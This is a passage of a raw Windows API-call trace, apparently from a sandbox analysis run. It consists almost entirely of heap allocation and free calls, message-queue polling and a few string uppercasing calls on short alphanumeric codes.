hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5e8 | out: hHeap=0x2af0000) returned 1 [0211.600] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719e8 | out: hHeap=0x2af0000) returned 1 [0211.600] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa570 | out: hHeap=0x2af0000) returned 1 [0211.600] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b08 | out: hHeap=0x2af0000) returned 1 [0211.600] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5b8 | out: hHeap=0x2af0000) returned 1 [0211.600] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ae8 [0211.600] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x3e21) returned 0x3867e40 [0211.600] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x3864010 | out: hHeap=0x2af0000) returned 1 [0211.600] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a58 | out: hHeap=0x2af0000) returned 1 [0211.600] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0211.600] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a68 [0211.601] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa558 [0211.601] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5b8 [0211.601] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a58 [0211.601] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a78 [0211.601] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x3e21) returned 0x3864010 [0211.601] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a58 | out: hHeap=0x2af0000) returned 1 [0211.601] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x3864010 | out: hHeap=0x2af0000) returned 1 [0211.601] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a78 | out: hHeap=0x2af0000) returned 1 [0211.601] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5b8 | out: hHeap=0x2af0000) returned 1 [0211.601] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa558 | out: hHeap=0x2af0000) returned 1 [0211.601] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a68 | out: hHeap=0x2af0000) returned 1 [0211.601] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0211.601] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719e8 [0211.601] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b08 [0211.601] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f6f00 [0211.601] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6f00 | out: hHeap=0x2af0000) returned 1 [0211.601] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b08 | out: hHeap=0x2af0000) returned 1 [0211.601] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719e8 | out: hHeap=0x2af0000) returned 1 [0211.601] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5ea40 [0211.601] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0211.601] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b08 [0211.601] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77f80 [0211.601] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a58 [0211.601] CharUpperBuffW (in: lpsz="A2600502813", cchLength=0xb | out: lpsz="A2600502813") returned 0xb [0211.601] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77f80 | out: hHeap=0x2af0000) returned 1 [0211.602] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a58 | out: hHeap=0x2af0000) returned 1 [0211.602] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa678 [0211.602] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a71a78 [0211.602] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa558 [0211.602] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6a8 [0211.602] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719d8 [0211.602] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719b8 [0211.602] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x3e21) returned 0x3864010 [0211.602] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719d8 | out: hHeap=0x2af0000) returned 1 [0211.602] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a719c8 [0211.602] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa780 [0211.602] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a58 [0211.602] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a58 | out: hHeap=0x2af0000) returned 1 [0211.602] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a71b78 [0211.602] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa570 [0211.602] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719d8 [0211.602] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719d8 | out: hHeap=0x2af0000) returned 1 [0211.602] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a719d8 [0211.602] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5b8 [0211.602] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719e8 [0211.602] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719e8 | out: hHeap=0x2af0000) returned 1 [0211.602] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa5e8 [0211.602] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78188 [0211.602] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6d8 [0211.603] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719e8 [0211.603] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6d8 | out: hHeap=0x2af0000) returned 1 [0211.603] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77fd0 [0211.603] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6d8 [0211.603] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a58 [0211.603] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x3e21) returned 0x2a8a938 [0211.603] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78098 [0211.603] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa918 [0211.603] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a68 [0211.603] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa918 | out: hHeap=0x2af0000) returned 1 [0211.603] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78020 [0211.603] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa858 [0211.603] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77fa8 [0211.603] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa8a0 [0211.603] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a88 [0211.603] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa8a0 | out: hHeap=0x2af0000) returned 1 [0211.603] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a780c0 [0211.603] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa8a0 [0211.603] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77ff8 [0211.603] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa918 [0211.604] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a98 [0211.604] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa918 | out: hHeap=0x2af0000) returned 1 [0211.604] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78430 [0211.604] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa918 [0211.604] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5dfa8 [0211.604] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0211.604] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71c28 [0211.604] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71d58 [0211.604] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa960 [0211.604] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa978 [0211.604] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ba8 [0211.604] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa990 [0211.604] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ba8 | out: hHeap=0x2af0000) returned 1 [0211.604] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71d88 [0211.604] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78340 [0211.604] CharUpperBuffW (in: lpsz="SSA2600502813", cchLength=0xd | out: lpsz="SSA2600502813") returned 0xd [0211.604] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78340 | out: hHeap=0x2af0000) returned 1 [0211.604] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d88 | out: hHeap=0x2af0000) returned 1 [0211.604] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa990 | out: hHeap=0x2af0000) returned 1 [0211.604] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa978 | out: hHeap=0x2af0000) returned 1 [0211.604] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa960 | out: hHeap=0x2af0000) returned 1 [0211.604] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d58 | out: hHeap=0x2af0000) returned 1 [0211.605] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c28 | out: hHeap=0x2af0000) returned 1 [0211.605] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5edc0 [0211.605] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0211.605] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5edc0 | out: hHeap=0x2af0000) returned 1 [0211.605] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0211.605] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa9c0 [0211.605] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71c18 [0211.605] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa9c0 | out: hHeap=0x2af0000) returned 1 [0211.605] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78110 [0211.605] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa960 [0211.605] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa978 [0211.605] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71bd8 [0211.605] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a780e8 [0211.605] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa20 [0211.605] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71d48 [0211.605] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa20 | out: hHeap=0x2af0000) returned 1 [0211.605] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78390 [0211.605] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa990 [0211.605] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa68 [0211.605] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78110 | out: hHeap=0x2af0000) returned 1 [0211.605] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c18 | out: hHeap=0x2af0000) returned 1 [0211.605] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa960 | out: hHeap=0x2af0000) returned 1 [0211.605] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0211.605] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa80 [0211.605] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71c08 [0211.605] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa80 | out: hHeap=0x2af0000) returned 1 [0211.605] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78110 [0211.606] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa960 [0211.606] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa9a8 [0211.606] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71d28 [0211.606] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78048 [0211.606] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa20 [0211.606] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71cf8 [0211.606] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa20 | out: hHeap=0x2af0000) returned 1 [0211.606] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78458 [0211.606] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa80 [0211.606] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa9c0 [0211.606] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78110 | out: hHeap=0x2af0000) returned 1 [0211.606] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c08 | out: hHeap=0x2af0000) returned 1 [0211.606] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa960 | out: hHeap=0x2af0000) returned 1 [0211.606] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0211.606] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa960 [0211.606] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71c58 [0211.606] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa960 | out: hHeap=0x2af0000) returned 1 [0211.606] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a783b8 [0211.606] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa960 [0211.606] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa20 [0211.606] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71d88 [0211.606] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a782a0 [0211.606] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa9f0 [0211.606] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71c78 [0211.606] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa9f0 | out: hHeap=0x2af0000) returned 1 [0211.606] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78318 [0211.607] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa9f0 [0211.607] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf30 [0211.607] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a783b8 | out: hHeap=0x2af0000) returned 1 [0211.607] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c58 | out: hHeap=0x2af0000) returned 1 [0211.607] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa960 | out: hHeap=0x2af0000) returned 1 [0211.607] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0211.607] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa960 [0211.607] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71d68 [0211.607] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa960 | out: hHeap=0x2af0000) returned 1 [0211.607] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78200 [0211.607] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa960 [0211.607] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab008 [0211.607] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ce8 [0211.607] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78368 [0211.607] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab0f8 [0211.607] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71d58 [0211.607] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab0f8 | out: hHeap=0x2af0000) returned 1 [0211.607] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78278 [0211.607] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf60 [0211.607] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae70 [0211.607] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78200 | out: hHeap=0x2af0000) returned 1 [0211.607] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d68 | out: hHeap=0x2af0000) returned 1 [0211.607] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa960 | out: hHeap=0x2af0000) returned 1 [0211.607] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0211.607] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa960 [0211.607] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71d18 [0211.607] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa960 | out: hHeap=0x2af0000) returned 1 [0211.607] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78070 [0211.608] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa960 [0211.608] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab020 [0211.608] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71c38 [0211.608] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78340 [0211.608] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae88 [0211.608] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71c68 [0211.608] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae88 | out: hHeap=0x2af0000) returned 1 [0211.608] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a783b8 [0211.608] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae88 [0211.608] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab038 [0211.608] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78070 | out: hHeap=0x2af0000) returned 1 [0211.608] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d18 | out: hHeap=0x2af0000) returned 1 [0211.608] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa960 | out: hHeap=0x2af0000) returned 1 [0211.608] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0211.608] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78228 [0211.608] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ba8 [0211.608] CharUpperBuffW (in: lpsz="A1100103809", cchLength=0xb | out: lpsz="A1100103809") returned 0xb [0211.608] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78228 | out: hHeap=0x2af0000) returned 1 [0211.608] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ba8 | out: hHeap=0x2af0000) returned 1 [0211.608] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa960 [0211.608] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5de40 [0211.608] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0211.608] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71d38 [0211.608] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71d08 [0211.608] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaed0 [0211.608] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab080 [0211.608] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ca8 [0211.608] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab0e0 [0211.609] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ca8 | out: hHeap=0x2af0000) returned 1 [0211.609] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71c08 [0211.609] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78408 [0211.609] CharUpperBuffW (in: lpsz="SSA1100103809", cchLength=0xd | out: lpsz="SSA1100103809") returned 0xd [0211.609] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78408 | out: hHeap=0x2af0000) returned 1 [0211.609] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c08 | out: hHeap=0x2af0000) returned 1 [0211.609] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab0e0 | out: hHeap=0x2af0000) returned 1 [0211.609] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab080 | out: hHeap=0x2af0000) returned 1 [0211.609] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaed0 | out: hHeap=0x2af0000) returned 1 [0211.609] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d08 | out: hHeap=0x2af0000) returned 1 [0211.609] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d38 | out: hHeap=0x2af0000) returned 1 [0211.609] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5edc0 [0211.609] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0211.609] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5edc0 | out: hHeap=0x2af0000) returned 1 [0211.609] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0211.609] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ba8 [0211.609] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78070 [0211.609] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71d98 [0211.609] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0211.609] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78070 | out: hHeap=0x2af0000) returned 1 [0211.609] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d98 | out: hHeap=0x2af0000) returned 1 [0211.609] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aab0e0 [0211.609] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a73b78 [0211.609] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0211.609] 